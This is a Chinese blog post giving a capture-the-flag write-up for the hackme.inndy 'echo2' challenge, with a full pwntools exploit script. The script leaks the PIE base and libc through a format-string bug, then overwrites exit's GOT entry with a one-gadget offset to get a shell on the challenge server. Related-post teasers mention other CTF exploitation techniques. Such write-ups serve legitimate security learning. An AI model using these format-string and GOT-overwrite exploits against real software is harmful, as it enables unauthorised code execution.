hackme inndy pwn echo2 writeup

最新推荐文章于 2023-10-02 22:35:36 发布
最新推荐文章于 2023-10-02 22:35:36 发布
阅读量855 收藏
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78940020
版权

这题做了好久。。。但是学到了很多很骚的思路

做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。

首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针

第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用pwntools生成的payload来直接打,要自己手动写一波payload,而且还要写多次,这样就不能像echo一样直接把printf的got表的值直接改成system的

那么怎么解决呢?

针对第一个问题,输入一长串%lx,看了下,第41个参数的位置存了一个指针,因为开了pie,所以直接把最低三位给抹去就是基址了

然后针对第二个问题的话,这里就要手动写一波leak和write了

def leak(addr):
    p.sendline('%8$sAAAABBBBCCCC'+p64(addr))
    data=p.recvuntil('AAAABBBB')
    p.recvrepeat(0.1)
    return data[:-8]

def write(b,addr):
    print('write in',hex(addr))
    payload='%'+str(b)+'c%8$hhn'
    payload+='A'*(16-len(payload))
    payload+=p64(addr)
    p.sendline(payload) 
    time.sleep(1)

那么这里能write之后 write哪里,write什么值呢?

看了一波别人的writeup,发现了一个骚操作,在libc里面一个地方是执行了execve(“/bin/sh”, &v48, environ); ,把这个偏移叫做magic值,把exit的got表的值改成libc+magic,那么就直接一发getshell

这里忘记说了,这里的libc是来自网站给的libc,但是如果没libc的话,也可以泄漏出两个函数的libc地址,用libc-database搜一波

最终的代码如下:

from pwn import *
import time

debug=0
if debug:
    p=process('./echo2')
    e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    magic=0x0D691F
else:
    p=remote('hackme.inndy.tw', 7712)
    e=ELF('./libc.so')
    magic=0x0f0897

context.bits=64
context.log_level='debug'
p.sendline("%41$lx") #得到指向程序的指针

addr=p.recv(12)[:-3]+"000"

addr=int(addr,16)

print(hex(addr))

#gdb.attach(proc.pidof(p)[0])

def leak(addr):
    p.sendline('%8$sAAAABBBBCCCC'+p64(addr))
    data=p.recvuntil('AAAABBBB')
    p.recvrepeat(0.1)
    return data[:-8]

def write(b,addr):
    print('write in',hex(addr))
    payload='%'+str(b)+'c%8$hhn'
    payload+='A'*(16-len(payload))
    payload+=p64(addr)
    p.sendline(payload) 
    time.sleep(1)

#write(16,0x201048+addr)
import struct

printfa=leak(0x201020+addr)[1:] #leak libc地址

printfa=struct.unpack('<Q',printfa+'\x00'*2)[0]

libc=printfa-e.symbols['printf']

magic_addr=magic+libc

print(hex(magic_addr))

magicc=struct.pack('<Q',magic_addr)

for i in range(6):
    write(ord(magicc[i]),addr+0x201048+i)#多次写

p.interactive()
charlie_heng
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
inndy_echo2
z1r0的博客
03-25 661
inndy_echo2 查看保护 64位下的格式化漏洞,泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。 pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。 from pwn import * from
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1508
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
hackme inndy petbook writeup
charlie_heng的专栏
02-16 442
这题一直没人做,感觉好像很难,其实是自己吓倒自己 这题的漏洞其实很明显,就是没有初始化对象,所以可以控制新new出来的user的pet的地址和post的地址 这里说下怎么控制 ·1. new一个比一个user大,即大于536字节的post 2. edit这个post,将这个post弄成更大的,这个时候realloc会把原来的堆给free掉,然后再new一个新的堆 3. 这个时候再new一...
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 540
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
hackme inndy pwn raas writeup
charlie_heng的专栏
12-31 366
继续做题,之前一直对堆不是很熟,这次特地做一道堆的题来练手 首先题目给了提示,是一道UAF 可以看到,有3个操作,一个是新建,一个是删除,一个是展示 删除和展示如上,新建的代码太长,我就简述下功能吧 1.选择类型,数字还是字符串 2.如果是字符串,要输入长度 3.输入内容 内存的操作是,先new了一个大小为12的堆,前8位放的是用于展示的函数指针和用于删除的函数指针 如...
PWN 基础篇 Write Up
最新发布
qq_61553520的博客
10-02 507
data 信息第一句定义了一个名为_data的数据段。segment关键字用于声明一个新的段,dword表示每个数据元素的大小为 4 字节,public表示该段可以在其他模块中访问,'DATA'是标识符,用于标识数据段。第二句则是将代码段(.text)的默认段寄存器cs和数据段(.data)的_data段寄存器进行关联。assume关键字用于指定段寄存器与段的关系,在这里它指定了cs寄存器与_data段寄存器的关联。通过这两句指令,我们可以确保在程序运行时,使用cs寄存器来访问_data段。
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 438
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 406
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 570
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 555
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
inndy_echo
weixin_46521144的博客
04-01 356
这道题比较简单,一个fmtstr直接丢给你做,没有栈溢出,虽然也没有canary 那就不管了,直接GOThijack 注意到其实函数本身是调用了system函数的,因此可以在plt表中直接找到system函数写入GOT表中 然后之前没注意,还尝试着把libc基址泄露之后把system的地址直接写回EXIT的GOT表中,尝试在发送EXIT之后调用。但是这样会导致不对齐的现象。。。 除此之外本题还学到一个新的内容。我本来以为fmtstr要写的内容必须是严格递增的 所以之前没有尝试去写print
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值